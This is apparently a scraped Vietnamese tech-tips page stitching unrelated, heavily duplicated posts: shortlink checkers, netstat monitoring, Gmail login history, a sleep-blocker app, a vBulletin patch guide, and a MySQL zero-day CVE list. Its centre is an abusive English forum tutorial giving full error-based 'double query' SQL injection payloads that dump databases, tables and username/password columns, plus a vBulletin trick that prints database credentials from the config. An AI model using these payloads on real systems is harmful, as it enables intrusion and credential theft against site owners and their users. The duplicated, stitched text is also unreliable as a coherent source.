Thủ thuật kiểm tra link thật của các shortlink nhanh chóng
Hiện
có rất nhiều dịch vụ rút gọn link (shortlink), thường thấy như goo.gl,
tinyurl.com, bit.ly... Việc rút gọn link giúp cho các liên kết dài dòng
được rút lại rất gọn, thuận lợi cho việc chia sẻ chúng với mọi người.
Một số dịch vụ rút gọn link cung câp một số tính năng như thống kê lượng
người click, số click này đến từ website nào...
Đó là ưu điểm của việc rút gọn link, nhưng có trường hợp một số kẻ xấu lợi dụng các shortlink để link tới các website có nội dung không tốt hay các đến các website có chứa mã độc nhằm lấy cắp thông tin người dùng. Việc biết trước liên kết thực sự một shortlink là việc làm cần thiết.
Sử dụng IDM
Bạn có thể biết trước link thật một shortlink rất dễ dàng bằng chương trình tăng tốc download quen thuộc IDM.
Trong giao diện IDM, bạn chọn Add URL, rồi nhập shortlink cần kiểm tra vào khung Address > OK. Ngay lập tức link thật sẽ "hiện nguyên hình" trong hộp thoại Download File Info. Nếu thấy website muốn truy cập an toàn bạn có thể an tâm sử dụng shortlink này.
Sử dụng Decryptlinks
Decryptlinks hỗ trợ xem link thật của hơn 70 dịch vụ shortlink thông dụng hiện nay như
Cách sử dụng Decryptlinks rất đơn giản. Ban truy cập địa chỉ http://www.decryptlinks.com, paste link rút gọn vào ô decrypt rồi nhấn Decrypt, ít giây sau ban sẽ nhận được link thật phía dưới. Decryptlinks cung cấp thêm một số thông tin về website đó chẳng hạn như title, description, keyword, trust level, screenshot.
Ngoài ra, Decryptlinks còn cung cấp
thêm add-on cho Firefox giúp việc kiểm tra shortlink tiện lợi, nhanh
chóng hơn. Bạn nhấn vào chữ Firefox Addon trên menu bar để cài addon
này. Addon này sẽ được tích hợp vào thanh tìm kiếm bên trái Firefox, bạn
chỉ việc chọn biểu tượng search Decrypt Short Links, paste link vào rồi
Enter.
Sử dụng Unshorten.
Cũng tương tự như Decryptlinks, Unshorten cung cấp khả năng hiện link thật của nhiều dịch vụ shortlink. Trong kết quả trả về, Unshorten đưa ra một số cảnh báo bảo mật về shortlink đó thông qua dịch vụ Web of Trust, các thông tin này bao gồm
Sử dụng Unshorten.
Cũng tương tự như Decryptlinks, Unshorten cung cấp khả năng hiện link thật của nhiều dịch vụ shortlink. Trong kết quả trả về, Unshorten đưa ra một số cảnh báo bảo mật về shortlink đó thông qua dịch vụ Web of Trust, các thông tin này bao gồm
Trustworthiness: mức độ tin cậy shortlink.
Vendor reliability: mức độ tin cậy của nhà cung cấp.
Privacy: mức độ riêng tư.
Child safety: độ an toàn cho trẻ em.
Hiện tại, Unshorten còn cung cấp extension cho trình duyệt Chrome và Firefox, bạn tải extension này về tại
http://unshorten.it/browser-extensionsVendor reliability: mức độ tin cậy của nhà cung cấp.
Privacy: mức độ riêng tư.
Child safety: độ an toàn cho trẻ em.
Hiện tại, Unshorten còn cung cấp extension cho trình duyệt Chrome và Firefox, bạn tải extension này về tại
Sau khi cài đặt thành công, Unshorten
sẽ được thêm vào menu ngữ cảnh của trình duyệt, muốn kiểm tra shortlink
nào chỉ việc phải chuột vào link đó, chọn Unshorten this link…
Xem Thêm
Kiểm tra các kết nối ẩn vào Internet trong Windows
Kết nối Internet của bạn chậm
hơn bình thường? Phải chăng máy tính của bạn đã nhiễm malware, spyware
hay adware, chúng đang chạy trong chế độ nền và tiêu tốn băng thông mà
bạn không hề biết? Sau đây là vài thủ thuật giúp bạn kiểm tra được các
kết nối từ máy tính của bạn vào Internet.
Máy tính của bạn đang kết nối đến những đâu?
Với các phiên bản Windows bạn có thể sử dụng câu lệnh netstat trong command prompt. Nó sẽ đưa ra danh sách tất cả các chương trình đang sử dụng kết nối Internet trong một khoảng thời gian nhất định.
Đầu tiên bạn cần chạy command prompt với quyền admin. Từ menu Start bạn gõ “cmd.exe” trong ô tìm kiếm. Bạn sẽ thấy chương trình cmd.exe, hãy click chuột phải vào chương trình đó và chọn “Run as administrator”.
Máy tính của bạn đang kết nối đến những đâu?
Với các phiên bản Windows bạn có thể sử dụng câu lệnh netstat trong command prompt. Nó sẽ đưa ra danh sách tất cả các chương trình đang sử dụng kết nối Internet trong một khoảng thời gian nhất định.
Đầu tiên bạn cần chạy command prompt với quyền admin. Từ menu Start bạn gõ “cmd.exe” trong ô tìm kiếm. Bạn sẽ thấy chương trình cmd.exe, hãy click chuột phải vào chương trình đó và chọn “Run as administrator”.
Nếu có hộp thoại của User Account Control yêu cầu xác nhận, bạn chọn Yes.
Trong command prompt, gõ câu lệnh sau và nhấn Enter:
netstat -abf 5 > activity.txt
Tùy chọn -a sẽ hiển thị tất cả các kết nối và cổng đang chờ kết nối. Tùy chọn -b cho bạn biết ứng dụng nào đang kết nối, và -f sẽ cho biết DNS của mỗi kết nối để dễ hiểu hơn về nơi mà kết nối đang tồn tại. Bạn có thể sử dụng thêm tùy chọn -n nếu bạn muốn hiển thị IP của kết nối tới. Số 5 trong câu lệnh cho biết cứ sau 5 giây thì chương trình sẽ kiểm tra lặp lại một lần và kết quả sẽ được lưu trong file activity.txt.
Chờ trong khoảng 2 phút rồi nhấn Ctrl + C để dừng câu lệnh.
Sau khi kết thúc việc ghi dữ liệu hãy mở file activity.txt bằng trình soạn thảo quen thuộc của bạn. Ở đây chúng tôi dùng Notepad.
Nội dung của file activity.txt sẽ là tất cả các tiến trình trên máy bạn (như trình duyệt, chương trình email, chat...) có kết nối vào Internet trong 2 phút chạy chương trình netstat.
Nếu bạn thấy bất cứ process hay tên,
địa chỉ website nào lạ, hãy search thông tin về nó trên Google. Có thể
đó là một chương trình hệ thống nhưng cũng có thế đó là một chương trình
virus, gián điệp... Dù sao nếu bạn nghi ngờ về nó, hãy tìm kiếm thông
tin, hỏi trên các diễn đàn đến khi biết chắc chắn nó là gì.
Dùng chương trình CurrPorts để kiểm tra các kết nối ẩn
Bạn cũng có thể sử dụng một phần mềm miễn phí tên CurrPorts để đơn giản
hóa cách thức sàng lọc lấy thông tin. Chương trình này cung cấp một giao
diện thân thiện hơn giúp bạn xem tất cả các kết nối TCP/IP và cổng UDP
đang mở trên máy tính. CurrPorts là một chương trình portable, bạn không
cần phải cài đặt để dùng.
Bạn sẽ nhận được một file .zip, giải nén nó và chạy file cports.exe. Chương trình hiển thị rất chi tiết và trực quan về các process, port, IP... bạn có thể lưu thông tin chương trình quét được vào các text hay HTML, XML để tiện cho việc phân tích về sau.
neo0 (Howtogeek)
Xem Thêm
Xác định tài khoản nguời dùng Gmail bị hack
Xin chào tất cả các bạn!
Hôm nay mình chia sẽ cho các bạn kỹ thuật mà bạn có thể sử để bắt các hacker.
Nếu bạn có nghi ngờ tài khoản Gmail của mình bị truy cập trái phép, các bạn có thể thực hiện theo các bước sau để xác định kẻ đã truy cập và hộp thư của mình.
1. Kiểm tra lịch sử truy cập
- Đăng nhập vào tài khoản Gmail của bạn và bạn kéo xuống bên dưới của trang web.
- Nhấp chọn chi tiết
Bây giờ, bạn có thể xem danh sách 10 địa chỉ ip mà bạn hay hacker đăng nhập vào tài khoản của bạn.
+> Địa chỉ IP: Là địa chỉ giao thức Internet (IP Address) là một con số được gán cho các thiết bị trong mạng máy tính (PC) như số điện thoại được gán cho mỗi điện thoại.
+> Cột 1 là phương thức truy cập, nếu bạn đang truy cập vào tài khoản Gmail của bạn từ trình duyệt sau đó bạn sẽ thấy trình duyệt trong cột này, nhưng nếu bảng hoạt động gần đây của bạn được hiển thị một số truy cập POP (Outlook, Thunderbird ...), nó có thể là một dấu hiệu rằng tài khoản của bạn đã bị xâm nhập.
+> Cột 2 (Location), cột này cho thấy địa chỉ IP của bạn từ nơi mà bạn đã truy cập tài khoản của bạn. Bạn có thể sử dụng trang web này Locator IP sẽ hỗ trợ bạn trong việc định vị vị trí địa lý của một địa chỉ IP.
Bạn xem thông tin nhiều hơn xem. Bạn sẽ thấy rất nhiều thông tin như ISP, tên, địa chỉ, số điện thoại liên lạc, địa chỉ email ... mà sẽ giúp bạn quyết định xem tài khoản của bạn đã bị xâm nhập hay không.
Nếu thư của bạn hiện đang được truy cập từ một vị trí khác, bạn sẽ thấy danh sách các phiên truy cập trong bảng thông tin . Bạn thay đổi mật khẩu của bạn nếu bạn nghĩ rằng tài khoản của bạn đã bị xâm nhập.
Hy vọng bạn thích bài viết này, chúc các bạn bảo mật tốt hơn.
Hôm nay mình chia sẽ cho các bạn kỹ thuật mà bạn có thể sử để bắt các hacker.
Nếu bạn có nghi ngờ tài khoản Gmail của mình bị truy cập trái phép, các bạn có thể thực hiện theo các bước sau để xác định kẻ đã truy cập và hộp thư của mình.
1. Kiểm tra lịch sử truy cập
- Đăng nhập vào tài khoản Gmail của bạn và bạn kéo xuống bên dưới của trang web.
- Nhấp chọn chi tiết
Bây giờ, bạn có thể xem danh sách 10 địa chỉ ip mà bạn hay hacker đăng nhập vào tài khoản của bạn.
+> Địa chỉ IP: Là địa chỉ giao thức Internet (IP Address) là một con số được gán cho các thiết bị trong mạng máy tính (PC) như số điện thoại được gán cho mỗi điện thoại.
+> Cột 1 là phương thức truy cập, nếu bạn đang truy cập vào tài khoản Gmail của bạn từ trình duyệt sau đó bạn sẽ thấy trình duyệt trong cột này, nhưng nếu bảng hoạt động gần đây của bạn được hiển thị một số truy cập POP (Outlook, Thunderbird ...), nó có thể là một dấu hiệu rằng tài khoản của bạn đã bị xâm nhập.
+> Cột 2 (Location), cột này cho thấy địa chỉ IP của bạn từ nơi mà bạn đã truy cập tài khoản của bạn. Bạn có thể sử dụng trang web này Locator IP sẽ hỗ trợ bạn trong việc định vị vị trí địa lý của một địa chỉ IP.
Bạn xem thông tin nhiều hơn xem. Bạn sẽ thấy rất nhiều thông tin như ISP, tên, địa chỉ, số điện thoại liên lạc, địa chỉ email ... mà sẽ giúp bạn quyết định xem tài khoản của bạn đã bị xâm nhập hay không.
Nếu thư của bạn hiện đang được truy cập từ một vị trí khác, bạn sẽ thấy danh sách các phiên truy cập trong bảng thông tin . Bạn thay đổi mật khẩu của bạn nếu bạn nghĩ rằng tài khoản của bạn đã bị xâm nhập.
Hy vọng bạn thích bài viết này, chúc các bạn bảo mật tốt hơn.
Xem Thêm
Ngăn chặn bị ngắt kết nối khi download trong Windows
Khi
đang thực hiện tải các tập tin có dung lượng lớn từ Internet về máy
tính. Đột nhiên, Windows rơi vào trạng thái ngủ đông để tiết kiệm năng
lượng theo thời gian mặc định đã làm gián đoạn công việc đang thực hiện
công việc, tiêu tốn thêm thời gian và phí Intenrnet của bạn.
Bài viết này sẽ giới thiệu một ứng dụng xách tay nhỏ gọn cho phép bạn ngăn chặn các chế độ tự động của Windows như Shutdown, Reboot, Stanby, Turn Off, Hibernation một cách hữu hiệu, ứng dụng có tên Don't Sleep.
Bài viết này sẽ giới thiệu một ứng dụng xách tay nhỏ gọn cho phép bạn ngăn chặn các chế độ tự động của Windows như Shutdown, Reboot, Stanby, Turn Off, Hibernation một cách hữu hiệu, ứng dụng có tên Don't Sleep.
Don't Sleep là một ứng dụng xách tay
không cần cài đặt, sau khi tải về giải nén kích hoạt tập tin thực thi
DontSleep.exe để ngăn chặn Windows kích hoạt các chế độ Stanby,
Hybrid-Stanby, Hibernation, Reboot, Shutdown nhằm tránh việc mất quyền
kiểm soát máy tính của bạn từ các hoạt động ngầm mặc định của Windows.
Ngoài ra, ứng dụng cũng có thể ngăn chặn hoạt động của chế độ bảo vệ màn
hình để không làm gián đoạn công việc của bạn.
Chức năng
Don't Sleep: cung cấp các tính năng cho phép bạn thực hiện với ứng dụng như:
To-Tray: Hiển thị trên thanh hệ thống.
Hide: Ẩn ứng dụng nếu muốn hiển thị trở lại bạn phải kích hoạt tập tin thực thi dontSleep.exe, không nên sử dụng.
Minimize to tray if Minimize: Hiển thị thu nhỏ trên thanh hệ thống khi bạn muốn thu nhỏ ứng dụng để làm việc với các ứng dụng khác.
Minimize to tray if Close: Hiển thị trên thanh hệ thống khi bạn nhấn đóng cửa sổ ứng dụng.
Enabling the Mini-HTTP feature: Kích hoạt chức năng kết nối với giao thức HTTP qua các cổng mặc định là 8080
Start Parameter: Hiển thị các tham số thực hiện việc vô hiệu hóa các chức năng.
Exit: Thoát khỏi ứng dụng.
System: Cho phép bạn liên kết nhanh với các chức năng của hệ thống như Task Manager, System, Power Config, Desktop, Monitor, Screensaver Timeout, Screensave, User Accounts, System Configuration và System Information.
Nút Option trong khung Blocking ứng dụng cung cấp các chức năng cho phép bạn thực hiện áp đặt thời gian sử dụng với Don't Sleep thông qua 2 tiện ích Program Star, When you reactivate the PC (from stanby...), hiển thị biểu tượng trên thanh hệ thống hoặc khởi động ứng dụng cùng Windows v.v....
Tại khung Timer ứng dụng cung cấp một số tiện ích cho phép bạn thực hiện để kích hoạt lại các tính năng và làm việc với Windows ở các chế độ sau khi thoát khỏi ứng dụng như:
Exit and Stop Blocking: Thoát và ngưng việc vô hiệu hóa các tính năng.
Exit and Shutdown: Thoát và tắt máy tính.
Exit and aggressive Shutdown: Thoát và ép buộc tắt máy tính.
Exit and Standby/Hibernation: Thoát và làm việc với Windows ở chế độ chờ/ngủ đông.
Disable Blocking: Vô hiệu hóa việc ngăn chặn các chế độ của Windows.
Lưu ý: Tác giả khuyên bạn hãy sử dụng chức năng Exit and Stop Blocking để tránh gián đoạn công việc nếu lỡ tay thoát khỏi ứng dụng và không làm tổn hại đến hoạt động của hệ thống khi bị chuyển đổi chế độ một cách bắt buộc.
Link: http://www.download.com.vn/don-t-sleep/download
Chức năng
Don't Sleep: cung cấp các tính năng cho phép bạn thực hiện với ứng dụng như:
To-Tray: Hiển thị trên thanh hệ thống.
Hide: Ẩn ứng dụng nếu muốn hiển thị trở lại bạn phải kích hoạt tập tin thực thi dontSleep.exe, không nên sử dụng.
Minimize to tray if Minimize: Hiển thị thu nhỏ trên thanh hệ thống khi bạn muốn thu nhỏ ứng dụng để làm việc với các ứng dụng khác.
Minimize to tray if Close: Hiển thị trên thanh hệ thống khi bạn nhấn đóng cửa sổ ứng dụng.
Enabling the Mini-HTTP feature: Kích hoạt chức năng kết nối với giao thức HTTP qua các cổng mặc định là 8080
Start Parameter: Hiển thị các tham số thực hiện việc vô hiệu hóa các chức năng.
Exit: Thoát khỏi ứng dụng.
System: Cho phép bạn liên kết nhanh với các chức năng của hệ thống như Task Manager, System, Power Config, Desktop, Monitor, Screensaver Timeout, Screensave, User Accounts, System Configuration và System Information.
Nút Option trong khung Blocking ứng dụng cung cấp các chức năng cho phép bạn thực hiện áp đặt thời gian sử dụng với Don't Sleep thông qua 2 tiện ích Program Star, When you reactivate the PC (from stanby...), hiển thị biểu tượng trên thanh hệ thống hoặc khởi động ứng dụng cùng Windows v.v....
Tại khung Timer ứng dụng cung cấp một số tiện ích cho phép bạn thực hiện để kích hoạt lại các tính năng và làm việc với Windows ở các chế độ sau khi thoát khỏi ứng dụng như:
Exit and Stop Blocking: Thoát và ngưng việc vô hiệu hóa các tính năng.
Exit and Shutdown: Thoát và tắt máy tính.
Exit and aggressive Shutdown: Thoát và ép buộc tắt máy tính.
Exit and Standby/Hibernation: Thoát và làm việc với Windows ở chế độ chờ/ngủ đông.
Disable Blocking: Vô hiệu hóa việc ngăn chặn các chế độ của Windows.
Lưu ý: Tác giả khuyên bạn hãy sử dụng chức năng Exit and Stop Blocking để tránh gián đoạn công việc nếu lỡ tay thoát khỏi ứng dụng và không làm tổn hại đến hoạt động của hệ thống khi bị chuyển đổi chế độ một cách bắt buộc.
Link: http://www.download.com.vn/don-t-sleep/download
Xem Thêm
SQL Injection - Double Query - Tutorial
Hey guys,
Okay, so I will be showing you how to apply a Double Query Sql Injection...
So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...
Anyways, lets begin:
Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:
Code:
No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:
Code:
So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...
Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).
Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...
Ok, lets get the boring stuff but they are important:
Code:
Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...
Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...
So whatever happens stick to that code up there and enough with bullshits...
Okay, so now we got these info, now lets get the Databases...
Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...
Example for Double Query:
Code:
as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...
use this one:
Code:
Code:
And this will show you ALL THE DATABASES AT ONCE...
but using this gay code:
Code:
will only show 1 Database...
Ok so now he have all the Databases, lets move on to getting the Tables...
This is what you should use to get the Tables:
Code:
Code:
Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...
Now lets Retrieve Data from the Columns, that's the good part lol:
So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...
Let me first show you what other people use and how gay it is and why...
Some people use this:
Code:
So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...
Now some people use this one:
Code:
Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...
So here's what to use:
Code:
So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...
Some Fucking Stuff you should know:
1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid
Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...
Take care all,
Okay, so I will be showing you how to apply a Double Query Sql Injection...
So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...
Anyways, lets begin:
Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:
Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--
No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:
Code:
Mã:
Different Number of Columns
So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...
Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).
Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...
Ok, lets get the boring stuff but they are important:
Code:
Mã:
whatever.com/index.php?id=myass
and (select 1 from (select count(*),concat((select(select
concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as
char),0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...
Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...
So whatever happens stick to that code up there and enough with bullshits...
Okay, so now we got these info, now lets get the Databases...
Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...
Example for Double Query:
Code:
Mã:
whatever.com/index.php?id=myass
and (select 1 from (select count(*),concat((select(select
concat(cast(database() as char),0x7e)) from information_schema.tables
where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...
use this one:
Code:
Mã:
whatever.com/index.php?id=myass
and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM
information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a) and 1=1
Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--
And this will show you ALL THE DATABASES AT ONCE...
but using this gay code:
Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--
will only show 1 Database...
Ok so now he have all the Databases, lets move on to getting the Tables...
This is what you should use to get the Tables:
Code:
Mã:
whatever.com/index.php?id=myass
and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM
information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Code:
Mã:
whatever.com/index.php?id=myass
and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM
information_schema.columns Where table_schema=0x"HEXDATABASE" AND
table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a) and 1=1
Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...
Now lets Retrieve Data from the Columns, that's the good part lol:
So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...
Let me first show you what other people use and how gay it is and why...
Some people use this:
Code:
Mã:
whatever.com/index.php?id=myass
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM
"databasename"."tablename" LIMIT 0,1) ) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a) and 1=1
So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...
Now some people use this one:
Code:
Mã:
whatever.com/index.php?id=myass
and (select 1 from (select count(*),concat((select
concat(username,0x7e,pass,0x7e7e) from "table" limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...
So here's what to use:
Code:
Mã:
whatever.com/index.php?id=myass
and (select 1 from (select count(*),concat((select(select
concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from
database.table limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...
Some Fucking Stuff you should know:
1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid
Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...
Take care all,
Xem Thêm
Multiple MySQL database Zero-day vulnerabilities published
Researcher discovered
Multiple Zero-day vulnerabilities in MySQL database software including
Stack based buffer overrun, Heap Based Overrun, Privilege Elevation,
Denial of Service and Remote Preauth User Enumeration.
Common Vulnerabilities and Exposures (CVE) assigned as :
CVE-2012-5611 — MySQL (Linux) Stack based buffer overrun PoC Zeroday
CVE-2012-5612 — MySQL (Linux) Heap Based Overrun PoC Zeroday
CVE-2012-5613 — MySQL (Linux) Database Privilege Elevation Zeroday Exploit
CVE-2012-5614 — MySQL Denial of Service Zeroday PoC
CVE-2012-5615 — MySQL Remote Preauth User Enumeration Zeroday
CVE-2012-5611 — MySQL (Linux) Stack based buffer overrun PoC Zeroday
CVE-2012-5612 — MySQL (Linux) Heap Based Overrun PoC Zeroday
CVE-2012-5613 — MySQL (Linux) Database Privilege Elevation Zeroday Exploit
CVE-2012-5614 — MySQL Denial of Service Zeroday PoC
CVE-2012-5615 — MySQL Remote Preauth User Enumeration Zeroday
Eric Posted MySQL Database Privilege Elevation 0day Exploit Demo:
Xem Thêm
Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin
1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker có thể login vào tài khoản của bất kỳ user nào mà không cần biết password là gì (Với điều kiện là Admin không biết config đúng file config.php cùa vBB).
Để fix lỗi này, có 2 cách mình đề xuất các bạn có thể thực hiện.
Cách 1:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data
Tìm:
Thêm vào bên dưới
Tìm:
PHP Code:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminid = preg_replace("/[^0-9,]+/","",$foruminid);//---End---By: Vũ Thanh Lai - SinhVienIT.Net
Cách 2:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data
Tìm:
Thêm vào bên dưới
Tìm:
PHP Code:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminidx = explode(',',$foruminid);
foreach($foruminidx as &$id)
{
$id=intval($id);
}$foruminid=implode(',',$foruminidx);//---End---By: Vũ Thanh Lai - SinhVienIT.Net
2. Lỗi CSRF
Với lỗi này, attacker phải có quyền từ SMod trở lên. Nếu nói đây là 1 lỗi thì cũng chưa chuẩn lắm. Vì nếu nó là 1 lỗi thì chả khác nào câu "Hacked by Admin"
Tuy nhiên, dù thế nào đi nữa, cái này cũng giúp 1 user có quyền SMod "leo thang đặc quyền được".
Cách khai thác lỗi này thì cũng đã được công bố chi tiết.
Để fix lỗi này mình đề xuất 2 cách.
Cách 1:
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần
admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn
cần lưu ý.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir']
Cách 2:
Bạn sử dụng Mod này.
Khi dùng mod này, mỗi lần có 1 request gửi đến AdminCP thì referer
trong HTTP Header sẽ đc kiểm tra xem request đó đến từ trang nào trong
forum. Nếu không phải từ AdminCP thì bạn phải click xác nhận thì request
mới đc tiếp tục xử lý.
Attacker đã làm như thế nào ?
Thời gian gần đây, attacker hay đi lục lọi các forum có sử dụng mod Changuondyu Statistics để tìm cách đưa câu "Hacked by..." vào đó. Sau khi khai thác lỗi này, chúng sẽ login đc vào tài khoản của SMod hoặc Admin để lợi dụng tiếp lỗi thứ 2 bên trên để chèn shell. Và thế là xong
Các Admin đã ngây thơ như thế nào ?
Trong file config.php của vBulletin có 1 phần mà hầu hết các Admin đều bỏ qua đó là COOKIE SECURITY HASH
PHP Code:
$config['Misc']['cookie_security_hash']
Khi 1 user login vào forum nếu có check dấu ghi nhớ để lần sau không phải login lại khi hết cookie timeout thì phía client sẽ có 3 cookie đc thiết lập.
cookieprefix_userid,cookieprefix_password và cookieprefix_remember
cái userid và remember chắc mình không cần nói, cái password nó không phải là password của người dùng, cũng không phải là password trong cột password của table user.
Nó là kết quả
PHP Code:
MD5(Cột_Password_Trong_table_User.$config['Misc']['cookie_security_hash'])
Còn nếu bạn có thiết lập giá trị cookie_security_hash ? Attacker không thể biết đc giá trị này nếu chưa attack vào đc host của bạn hay có shell trên server. Như vậy, cho dù có lấy đc cả table user thì attacker cũng không thể nào login vào bất kỳ tài khoản nào cả (ngoại trừ trường hợp bạn sử dụng password quá đơn giản như 123456 )
Vì vậy, khi đọc xong bài này, hãy mở ngay file config của bạn lên và thêm 1 chuỗi ký tự bất kỳ vào $config['Misc']['cookie_security_hash'] nhé. Làm ngay và luôn kẻo bị attack nhé
Nguồn: Sinhvienit.net
Xem Thêm
vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick
Go to acp, Faq Manager and then edit a FAQ, add the following code:
{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}
Save it.
Go to http://[path]/faq.php and check it
# 1337day.com [2012-12-07]
Xem Thêm
[TUT]Sử dụng metasploit fake addon firepux hack any computer
Đây là video tuy còn sơ sài mong anh em ủng hộ thêm , và tut còn
nhiều sai sót!trong bài này mọi người có thể dùng kỹ thuật arp để đánh
lừa victim!